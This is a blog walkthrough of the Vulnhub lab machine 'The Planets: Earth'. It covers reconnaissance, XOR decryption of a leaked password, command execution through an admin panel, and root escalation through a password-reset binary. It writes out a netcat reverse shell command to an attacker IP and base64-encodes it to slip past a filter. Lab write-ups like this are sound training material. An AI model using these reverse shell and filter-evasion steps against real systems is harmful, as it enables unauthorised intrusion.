top of page
Image by Blake Cheek
  • Writer's pictureBeri Contraster

The Planets: Earth Walkthrough - Vulnhub


Earth
Earth

Name: The Planets: Earth

Date release: 2 Nov 2021

Author: SirFlash

Series: The Planets

Difficulty: Easy


Welcome Reader, Today we'll pwn "The Planets: Earth" from vulnhub. Let's start with an Nmap scan.


There is a Fedora web server running on the 443 port.


There was nothing on this I also tried directory fuzzing but no luck. I then checked the SSL Certificate and it revealed DNS names.


There are some encrypted messages on earth.local.


Doing another Directory Fuzzing on earth.local revealed some interesting directories.


Let's start with the /robots.txt file. Looking through the /robots.txt file I found another interesting file.


/testingnotes.txt revealed a username and encryption algorithm for the messages on earth.local.


It also says the testdata.txt was used to test encryption.


Time to do some decryption I used CyberChef. I converted it to "From Hex" and then used "XOR" with the data from /testdata.txt as the key. This revealed the password for the user Terra. We can use these to login into the admin panel that we discovered from dirb scan.


After logging into the admin panel at http://earth.local/admin/login I could execute commands on the system as the user Apache. Time to get a reverse shell.


I copied a reverse shell command from RevShells. It's a great source. Fire up your Netcat listener and enter the reverse shell command.


It failed because the remote connection is not allowed from the target machine. Let's try bypassing that by encrypting our command in base64.


echo "nc -e /bin/bash 10.10.10.4 4444" | base64

Copy the output and execute it by decrypting it and passing it to bash.


echo "copied shell" | base64 -d | bash

I successfully received a shell.



Let's do a shell upgrade. You can copy and paste the command from here.


Let's escalate our privileges to the root user. After doing some enumeration I found an interesting file.



Further enumeration of the file showed that it's an executable file but I couldn't execute it on the target machine.


It gives reset failed we need to take a deep look inside the file so I moved the file to my attacking machine using Netcat. We can't use the Python3 server because the remote connection is forbidden.


I used the ltrace tool to extract the file contents. Ltrace is a debugging utility in Linux. If you get the permission denied error just make the file executable using chmod.


This executable file checks if those three files exist before resetting the root password. What we can do is create those three files at the same locations so that the executable resets the password.



Let's try executing the file reset_root now.


It successfully changed the root password to Earth. Thanks for reading. If you have any questions please don't hesitate to ask.


Happy Hacking!



19 views2 comments

Recent Posts

See All

2 Comments


Beri Contraster
Beri Contraster
Mar 14

Comment

Like
Beri Contraster
Beri Contraster
Mar 14
Replying to


Like
bottom of page